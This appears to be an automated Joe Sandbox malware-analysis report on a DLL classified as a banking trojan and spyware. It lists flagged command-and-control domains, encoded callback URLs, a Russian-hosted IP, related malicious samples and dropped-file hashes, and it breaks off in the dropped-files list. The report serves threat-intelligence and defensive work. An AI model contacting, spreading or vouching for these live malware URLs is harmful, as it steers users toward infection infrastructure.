                      http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic100%Avira URL Cloudmalware
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://init.icecreambob.com/lbK100%Avira URL Cloudmalware
                      http://ns.adobe.cmg0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://init.icecreambob.com/100%Avira URL Cloudmalware
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B100%Avira URL Cloudmalware
                      http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy100%Avira URL Cloudmalware
                      https://contoso.com/0%URL Reputationsafe
                      http://art.microsoftsofymicrosoftsoft.at/F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn70%Avira URL Cloudsafe
                      http://ns.adobe.ux0%Avira URL Cloudsafe
                      http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb100%Avira URL Cloudmalware
                      http://init.icecreambob.com/l100%Avira URL Cloudmalware
                      http://ns.micro/10%Avira URL Cloudsafe
                      http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      myip.opendns.com
                      		102.129.143.57
                      		truefalse
                        		high
                        resolver1.opendns.com
                        		208.67.222.222
                        		truefalse
                          		high
                          init.icecreambob.com
                          		194.147.86.221
                          		truetrueunknown
                          art.microsoftsofymicrosoftsoft.at
                          		194.147.86.221
                          		truetrueunknown
                          222.222.67.208.in-addr.arpa
                          		unknown
                          		unknowntrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KTtrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ictrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2Btrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLytrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://art.microsoftsofymicrosoftsoft.at/F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7true
                          • Avira URL Cloud: safe
                          		unknown
                          http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/itrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Immrundll32.exe, 00000003.00000003.826552250.0000000000AE2000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpfalse
                            		high
                            http://twitter.com/spotify:RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmpfalse
                              		high
                              https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-AdventureRuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpfalse
                                		high
                                http://ns.adobe.co/xaRuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpfalse
                                  		high
                                  https://corp.roblox.com/contact/RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpfalse
                                    		high
                                    https://www.roblox.com/developRuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpfalse
                                      		high
                                      http://ns.adobp/RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/Licensepowershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://init.icecreambob.com/lbKrundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://ns.adobe.cmgRuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.tiktok.com/legal/report/feedbackRuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.g5e.com/G5_End_User_License_Supplemental_TermsW~RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpfalse
                                        		high
                                        https://corp.roblox.com/parents/RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpfalse
                                          		high
                                          https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.g5e.com/G5_End_User_License_Supplemental_TermsRuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpfalse
                                              		high
                                              http://init.icecreambob.com/rundll32.exe, 00000003.00000003.841471789.0000000000AE2000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://constitution.org/usdeclar.txtloaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://contoso.com/powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmpfalse
                                                		high
                                                https://www.roblox.com/info/privacyRuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://ns.adobe.uxRuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.g5e.com/termsofserviceRuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbrundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://en.help.roblox.com/hc/en-usRuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://init.icecreambob.com/lrundll32.exe, 00000003.00000003.831975638.0000000000AF4000.00000004.00000001.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://ns.micro/1RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.963606313.0000029E48941000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.935740628.0000026442311000.00000004.00000001.sdmpfalse
                                                        		high

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        194.147.86.221
                                                        		init.icecreambob.comRussian Federation
                                                        		61400NETRACK-ASRUtrue

                                                        General Information

                                                        Joe Sandbox Version:33.0.0 White Diamond
                                                        Analysis ID:498359
                                                        Start date:07.10.2021
                                                        Start time:01:30:08
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 14m 17s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:data.dll
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:46
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.bank.troj.spyw.evad.winDLL@53/41@12/1
                                                        EGA Information:Failed
                                                        HDC Information:
                                                        • Successful, ratio: 27.3% (good quality ratio 26.4%)
                                                        • Quality average: 80.7%
                                                        • Quality standard deviation: 27.7%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .dll
                                                        • Override analysis time to 240s for rundll32
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                        • TCP Packets have been reduced to 100
                                                        • Excluded IPs from analysis (whitelisted): 20.82.210.154, 95.100.218.79, 20.50.102.62, 20.82.209.183, 2.20.178.24, 2.20.178.33, 20.54.110.249, 40.112.88.60
                                                        • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        01:32:09API Interceptor4x Sleep call for process: loaddll32.exe modified
                                                        01:32:19API Interceptor2x Sleep call for process: rundll32.exe modified
                                                        01:32:30API Interceptor84x Sleep call for process: powershell.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        194.147.86.2212u2mgtylJy.dllGet hashmaliciousBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          myip.opendns.comtest1.dllGet hashmaliciousBrowse
                                                          • 102.129.143.57
                                                          test1.dllGet hashmaliciousBrowse
                                                          • 185.32.222.18
                                                          97Ys56eAFo.dllGet hashmaliciousBrowse
                                                          • 84.17.52.9
                                                          new_working_conditions[2021.09.23_12-51].xlsbGet hashmaliciousBrowse
                                                          • 84.17.52.9
                                                          OcEyzBswGm.exeGet hashmaliciousBrowse
                                                          • 84.17.52.41
                                                          Invoice778465.xlsbGet hashmaliciousBrowse
                                                          • 185.189.150.74
                                                          o0AX0nKiUn.dllGet hashmaliciousBrowse
                                                          • 84.17.52.3
                                                          document-1774544026.xlsGet hashmaliciousBrowse
                                                          • 84.17.52.79
                                                          316.xlsmGet hashmaliciousBrowse
                                                          • 84.17.52.79
                                                          moan.dllGet hashmaliciousBrowse
                                                          • 84.17.52.79
                                                          document-5505542.xlsmGet hashmaliciousBrowse
                                                          • 84.17.52.79
                                                          document-1223674862.xlsmGet hashmaliciousBrowse
                                                          • 84.17.52.79
                                                          e6.exeGet hashmaliciousBrowse
                                                          • 84.17.52.78
                                                          j81SoD9q5b.xlsGet hashmaliciousBrowse
                                                          • 84.17.52.78
                                                          xls.xlsGet hashmaliciousBrowse
                                                          • 84.17.52.38
                                                          0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                          • 84.17.52.25
                                                          6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                          • 84.17.52.25
                                                          2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                          • 84.17.52.25
                                                          earmarkavchd.dllGet hashmaliciousBrowse
                                                          • 84.17.52.25
                                                          6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                          • 84.17.52.25
                                                          resolver1.opendns.comtest1.dllGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          test1.dllGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          97Ys56eAFo.dllGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          new_working_conditions[2021.09.23_12-51].xlsbGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          20210915_id99.dllGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          presentation[2021.09.09_15-26].vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          sample.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          345678.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          start[526268].vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          documentation_446618.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          start[873316].vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          6bI5jJ1oIXeI.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          nostalgia.dllGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          Lbh0K9szYgv5.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          ursi.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          OcEyzBswGm.exeGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          u0So5MG5rkxx.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          PIfkvZ5Gh6PO.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          Ry1j2eCohwtN.vbsGet hashmaliciousBrowse
                                                          • 208.67.222.222
                                                          Invoice778465.xlsbGet hashmaliciousBrowse
                                                          • 208.67.222.222

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          NETRACK-ASRU2u2mgtylJy.dllGet hashmaliciousBrowse
                                                          • 194.147.86.221
                                                          NF3zeW1ZZO.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          OnjY219B7v.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          HS33i28Q3u.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          eKhZXMkd5v.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          vQP52P1Isj.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          D44D77232A9E6E684F1ECE4C9C05B3DCB63D4296CFD29.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          tWCGKtYHA3.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          1B18CE7B513855676EF76C17FCF6B6D492F20E197FAE1.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          t7mBrAjNrV.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          2D100CC76F229AC10A7589E1AEA0BFB47B5692840D8F2.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          4F1F6C55849D794E71B3F37EB1C700348E31A080EAA14.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          AC8CF25A55659954E3C2BDF2A3B53115F139BE50F049A.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          FVOW699wqS.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          BB265B16D6C6DAE08BBDF4E7798FE06AA676AC4A8AA9A.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          KxZXftb514.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          dg6r7HJdd4.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          UxR7Q2lLed.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          W8o6lejZD3.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96
                                                          sAQnBjf2AF.exeGet hashmaliciousBrowse
                                                          • 194.169.163.96

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11606
                                                          Entropy (8bit):4.8910535897909355
                                                          Encrypted:false
                                                          SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
                                                          MD5:7A57D8959BFD0B97B364F902ACD60F90
                                                          SHA1:7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
                                                          SHA-256:47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
                                                          SHA-512:83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
                                                          Malicious:false
                                                          Preview: PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1192
                                                          Entropy (8bit):5.325275554903011
                                                          Encrypted:false
